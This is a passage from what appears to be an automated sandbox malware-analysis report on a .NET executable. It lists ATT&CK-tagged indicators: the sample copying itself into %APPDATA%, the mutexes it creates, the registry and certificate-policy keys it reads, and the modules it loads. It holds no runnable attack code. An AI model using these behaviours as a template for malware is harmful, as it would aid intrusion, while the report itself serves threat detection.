\"INSERT INTO `review`(`movie_id`, `username`, `review_provided`, `rating`) VALUES ('\" (Source: 600003e-ProvideReview~button1_Click_1, Indicator: \"insert into `review`(`movie_id`, `username`, `review_provided`, `rating`) values ('\")\n \"SELECT * FROM director\" (Source: 6000043-ctor, Indicator: \"select * from director\")\n \"SELECT * FROM actor\" (Source: 6000043-ctor, Indicator: \"select * from actor\")\n \"SELECT * FROM movie\" (Source: 6000043-ctor, Indicator: \"select * from movie\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"CopyFileW\" to copy C:\\PCGB2GtVYuBR0mw.pif.exe to new location %APPDATA%\\SUbPwEbpBhA.exe (UID: 00000000-00002912)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 64020000\n \"powershell.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 64020000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74E10000\n \"powershell.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74E10000\n \"powershell.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 749D0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\PDocjnzeoflPbxzNZeuIVzsdIQG\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"PDocjnzeoflPbxzNZeuIVzsdIQG\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"PCGB2GtVYuBR0mw.pif.exe\" touched \"Security Manager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"powershell.exe\" touched \"NDP SymBinder\" (Path: \"HKCU\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\INPROCSERVER32\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-18", "type": 3, "relevance": 10, "name": "Accesses Software Policy Settings", "description": "\"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"GDI32.DLL\" at base 77540000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77620000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"KERNEL32\" at base 75d40000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"ADVAPI32.DLL\" at base 771a0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6be00000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"SHLWAPI.DLL\" at base 75f50000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"VERSION.DLL\" at base 74790000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 68e90000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"USER32.DLL\" at base 75e20000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"MSCOREE.DLL\" at base 71fb0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"PSAPI.DLL\" at base 77590000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"RPCRT4.DLL\" at base 758f0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"KERNEL32.DLL\" at base 75d40000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 64020000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"OLE32.DLL\" at base 75790000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"CRYPTBASE.DLL\" at base 751f0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74030000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 71d90000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6aff0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 68430000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 6a7d0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 631b0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.WINDOWS.FORMS\\V4.0_4.0.0.0__B77A5C561934E089\\UXTHEME.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"UXTHEME.DLL\" at base 74030000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 62990000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 6aee0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 62210000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 72040000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"NTDLL.DLL\" at base 773f0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"SHELL32.DLL\" at base 75fb0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75d20000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"PROFAPI.DLL\" at base 75300000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"BCRYPT.DLL\" at base 74e10000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"CRYPTSP.DLL\" at base 74d00000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a90000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"IMM32.DLL\" at base 77620000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"COMCTL32.DLL\" at base 71a80000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.V9921E851#\\A891970B44DB9E340C3EF3EFA95B793C\\MICROSOFT.VISUALBASIC.NI.DLL\" at base 6a5e0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"GDIPLUS.DLL\" at base 73c50000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\WINSXS\\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.23894_NONE_5C0BE957A009922E\\GDIPLUS.DLL\" at base 73c50000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75d40000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"WINDOWSCODECS.DLL\" at base 73690000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"AMSI.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ICONCODECSERVICE.DLL\" at base 6f7f0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"NTDLL\" at base 773f0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\NTDLL.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"PROPSYS.DLL\" at base 73e20000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"COMCTL32.DLL\" at base 741f0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"OLEAUT32.DLL\" at base 759a0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"APPHELP.DLL\" at base 751a0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"CLBCATQ.DLL\" at base 75630000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 69640000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"SETUPAPI.DLL\" at base 77250000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73e20000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"NTMARTA.DLL\" at base 74760000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75570000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75a40000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"SECUR32.DLL\" at base 75030000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 753b0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 751a0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"SSPICLI.DLL\" at base 75180000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75d20000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75290000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"powershell.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"powershell.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"powershell.exe\" loaded module \"KERNEL32\" at base 75d40000\n \"powershell.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"powershell.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c900000\n \"powershell.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"powershell.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"powershell.exe\" loaded module \"VERSION.DLL\" at base 74790000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 68e90000\n \"powershell.exe\" loaded module \"USER32.DLL\" at base 75e20000\n \"powershell.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"powershell.exe\" loaded module \"MSCOREE.DLL\" at base 71fb0000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"powershell.exe\" loaded module \"PSAPI.DLL\" at base 77590000\n \"powershell.exe\" loaded module \"RPCRT4.DLL\" at base 758f0000\n \"powershell.exe\" loaded module \"KERNEL32.DLL\" at base 75d40000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCOREE.DLL\" at base 71fb0000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 64020000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"powershell.exe\" loaded module \"OLE32.DLL\" at base 75790000\n \"powershell.exe\" loaded module \"CRYPTBASE.DLL\" at base 751f0000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\OLEAUT32.DLL\" at base 0\n \"powershell.exe\" loaded module \"OLEAUT32.DLL\" at base 759a0000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 68430000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 62990000\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.PB378EC07#\\D254C63BEDCB76C81C3125BD527B7D1A\\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL\" at base 6ace0000\n \"powershell.exe\" loaded module \"CRYPTSP.DLL\" at base 74d00000\n \"powershell.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a90000\n \"powershell.exe\" loaded module \"ADVAPI32.DLL\" at base 771a0000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLEAUT32.DLL\" at base 0\n \"powershell.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.MANAA57FC8CC#\\73A1A80AED03E789A49CEC899B7505DD\\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL\" at base 60720000\n \"powershell.exe\" loaded module \"NTDLL.DLL\" at base 773f0000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 72040000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"powershell.exe\" loaded module \"SHELL32.DLL\" at base 75fb0000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.MANAGEMENT.AUTOMATION\\V4.0_3.0.0.0__31BF3856AD364E35\\WINTRUST.DLL\" at base 0\n \"powershell.exe\" loaded module \"WINTRUST.DLL\" at base 753e0000\n \"powershell.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.MANAGEMENT.AUTOMATION\\V4.0_3.0.0.0__31BF3856AD364E35\\AMSI.DLL\" at base 0\n \"powershell.exe\" loaded module \"MSISIP.DLL\" at base 72820000\n 